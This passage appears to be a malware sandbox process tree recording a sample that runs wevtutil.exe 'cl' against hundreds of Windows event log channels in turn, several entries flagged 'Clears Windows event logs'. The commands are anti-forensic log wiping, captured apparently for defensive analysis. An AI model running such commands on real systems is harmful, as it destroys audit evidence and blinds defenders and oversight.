C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"4⤵
- Clears Windows event logs
PID:3988
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"4⤵PID:4020
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"4⤵PID:560
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"4⤵PID:4044
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"4⤵PID:4056
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"4⤵PID:4040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"4⤵PID:900
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"4⤵PID:1980
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"4⤵PID:4084
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"4⤵PID:2812
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Operational"4⤵PID:1812
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Performance"4⤵PID:1804
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audit/Analytic"4⤵
- Clears Windows event logs
PID:2636
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"4⤵PID:2576
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"4⤵PID:1648
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Backup"4⤵PID:2556
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"4⤵PID:2412
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"4⤵PID:184
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"4⤵PID:2864
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"4⤵PID:3024
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"4⤵PID:2452
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"4⤵PID:1664
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"4⤵PID:3060
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"4⤵PID:1016
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"4⤵
- Clears Windows event logs
PID:1760
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"4⤵PID:2260
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"4⤵PID:1992
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"4⤵PID:2420
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CDROM/Operational"4⤵PID:1712
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/Analytic"4⤵PID:948
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"4⤵
- Clears Windows event logs
PID:3044
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Calculator/Debug"4⤵PID:2104
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"4⤵PID:2700
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"4⤵PID:2396
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"4⤵PID:2664
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"4⤵PID:2824
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"4⤵PID:564
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"4⤵PID:1100
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"4⤵PID:1732
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"4⤵PID:588
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"4⤵PID:224
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"4⤵PID:1700
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"4⤵
- Clears Windows event logs
PID:1548
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"4⤵PID:2384
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"4⤵PID:216
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"4⤵PID:936
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"4⤵PID:2300
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"4⤵PID:2484
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"4⤵
- Clears Windows event logs
PID:1536
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"4⤵PID:2116
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"4⤵PID:2136
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"4⤵PID:2564
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Logging"4⤵PID:2216
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXP/Analytic"4⤵PID:1660
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"4⤵PID:2788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"4⤵PID:2928
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"4⤵PID:996
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"4⤵PID:2896
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"4⤵PID:2424
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"4⤵PID:1572
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"4⤵PID:1296
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"4⤵PID:2752
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"4⤵PID:3016
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"4⤵PID:1576
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"4⤵PID:2760
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"4⤵PID:2008
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"4⤵PID:2168
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"4⤵PID:2068
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"4⤵PID:2984
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"4⤵PID:1044
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"4⤵PID:2368
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"4⤵
- Clears Windows event logs
PID:2468
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"4⤵PID:1652
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"4⤵PID:2608
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"4⤵
- Clears Windows event logs
PID:1400
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"4⤵PID:2476
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"4⤵PID:2040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"4⤵PID:2164
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"4⤵PID:848
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"4⤵
- Clears Windows event logs
PID:1308
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"4⤵PID:1136
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"4⤵PID:484
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"4⤵
- Clears Windows event logs
PID:1040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"4⤵PID:1104
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"4⤵PID:3592
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"4⤵PID:4568
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"4⤵PID:2248
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"4⤵PID:436
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"4⤵PID:668
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"4⤵PID:2844
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"4⤵PID:4220
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"4⤵PID:3136
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"4⤵
- Clears Windows event logs
PID:3148
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"4⤵PID:3296
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"4⤵PID:3620
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"4⤵PID:3588
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"4⤵PID:3564
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"4⤵PID:4172
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"4⤵PID:4584
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"4⤵PID:4196
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"4⤵PID:4208
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"4⤵PID:4232
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"4⤵PID:2316
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"4⤵
- Clears Windows event logs
PID:3128
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"4⤵
- Clears Windows event logs
PID:3116
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Disk/Operational"4⤵PID:3104
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"4⤵PID:3092
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"4⤵PID:3080
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"4⤵PID:1528
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"4⤵PID:4256
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"4⤵PID:2332
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"4⤵PID:4324
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Documents/Performance"4⤵PID:4336
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"4⤵PID:4372
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"4⤵PID:4356
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"4⤵
- Clears Windows event logs
PID:1228
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"4⤵PID:4384
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"4⤵PID:3264
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EFS/Debug"4⤵PID:3156
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"4⤵PID:3324
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Debug"4⤵PID:1784
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Operational"4⤵PID:536
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"4⤵PID:4776
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"4⤵PID:4296
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"4⤵PID:4284
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"4⤵PID:4264
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"4⤵
- Clears Windows event logs
PID:4300
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog/Debug"4⤵PID:4308
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Analytic"4⤵PID:4760
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Debug"4⤵PID:4748
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Operational"4⤵PID:4716
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"4⤵PID:4732
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"4⤵PID:4712
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"4⤵PID:4676
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"4⤵PID:4688
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"4⤵
- Clears Windows event logs
PID:4660
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"4⤵PID:4652
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"4⤵PID:4640
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"4⤵PID:4628
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"4⤵PID:4616
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"4⤵PID:4608
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HAL/Debug"4⤵PID:3892
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"4⤵PID:3604
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"4⤵
- Clears Windows event logs
PID:3488
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"4⤵PID:2128
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Help/Operational"4⤵PID:3508
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"4⤵PID:3548
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"4⤵
- Clears Windows event logs
PID:3408
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"4⤵
- Clears Windows event logs
PID:3420
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"4⤵PID:3540
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"4⤵PID:2200
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"4⤵
- Clears Windows event logs
PID:2488
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"4⤵PID:972
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HttpService/Trace"4⤵
- Clears Windows event logs
PID:4168
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IKE/Operational"4⤵PID:4416
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"4⤵PID:3428
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"4⤵PID:3432
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"4⤵PID:3448
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"4⤵PID:3456
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-International/Operational"4⤵PID:3472
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"4⤵PID:3356
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"4⤵PID:3376
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"4⤵PID:2544
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"4⤵PID:3384
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"4⤵PID:3352
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"4⤵PID:4152
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"4⤵
- Clears Windows event logs
PID:4140
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"4⤵PID:4132
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"4⤵PID:2080
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"4⤵PID:2508
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"4⤵
- Clears Windows event logs
PID:1352
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"4⤵PID:2288
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"4⤵PID:1092
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"4⤵
- Clears Windows event logs
PID:2264
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"4⤵PID:2084
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"4⤵PID:2188
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"4⤵PID:2936
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"4⤵PID:4100
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"4⤵PID:2820
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"4⤵PID:4432
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"4⤵PID:3336
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"4⤵PID:2736
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"4⤵PID:3396
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"4⤵PID:388
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"4⤵PID:2004
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"4⤵PID:1764
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"4⤵PID:1592
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Known Folders API Service"4⤵PID:4128
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"4⤵PID:4116
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"4⤵PID:3008
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"4⤵PID:572
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"4⤵PID:4464
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"4⤵PID:4456
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"4⤵PID:4444
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MCT/Operational"4⤵PID:4480
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"4⤵PID:4492
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"4⤵
- Clears Windows event logs
PID:2428
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"4⤵PID:4528
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"4⤵PID:4540
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"4⤵PID:4556
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"4⤵PID:4496
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Admin"4⤵PID:4508
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Analytic"4⤵PID:4516
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Debug"4⤵PID:4816
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Operational"4⤵PID:4796
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"4⤵PID:4824
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"4⤵PID:4844
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"4⤵PID:4832
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"4⤵PID:4864
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"4⤵PID:4876
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"4⤵PID:4912
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"4⤵
- Clears Windows event logs
PID:4896
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NCSI/Operational"4⤵PID:4916
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"4⤵PID:5000
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"4⤵PID:4988
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"4⤵PID:4972
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS/Operational"4⤵PID:4944
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NTLM/Operational"4⤵PID:4940
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"4⤵PID:4920
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"4⤵PID:4928
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetShell/Performance"4⤵PID:4952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"4⤵PID:5020
-
-
